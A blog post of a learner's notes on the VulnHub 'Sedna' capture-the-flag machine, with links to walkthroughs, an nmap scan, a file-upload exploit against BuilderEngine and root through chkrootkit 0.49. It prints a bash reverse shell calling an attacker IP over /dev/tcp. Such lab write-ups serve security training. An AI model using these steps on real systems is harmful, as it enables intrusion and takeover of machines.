Skip to main content

32 VM hackfest2016: Sedna

Walkthru:

A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, ]

B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation]

C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]

D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [ditrycow]

Notes:

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protoc                                                                                                                               ol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open  unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
00000000000000000000000000
dirb and nikto on port 80 and 8080, found some interesting folders/files and java server pages (JSP), some giving 403 access forbidden. JSP and Coyote shows many pages but not anything signficant.
Some vulns but nothing worked. Ran smb cmds but nothing so far. Robots.txt also didnt show anything or PUT method which also showed 403 access forbidden. Tried hydra for SMB and SSH for user "victor" but nothing 
00000000000000000000000000
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file . Tried to upload a file using POSTER plugin but it would rename the file and remove the PHP extension. The exploit also has an html code that can be used to upload a reverse shell file using POST method

$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home
Tried many exploit for pric escalation but didn't work.  I decided to do more enumerations I found out chkrootkit is installed on the machine. To our luck version 0.49 is installed. This was found in privledge escalation script

Searching on searchsploit we have found an exploit for chkrootkit version 0.49. As per the vulnerability  chkrootkit will execute all the files with root privileges. We will now create a bash script for reverse shell and wget into "tmp" folder: 192.168.213.149 is Kali in this case

#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we will wget the script into the "tmp" directory and make it executable.

Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell which was after 5-15 minutes. I could run it manually but it would give me www access only

00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000


smb_192.168.117.8.nmap
00000000000000000000000000

Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

Penetration Testing Framework 0.57

Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack. http://www.vulnerabilityassessment.co.uk/
Post a Comment
Read more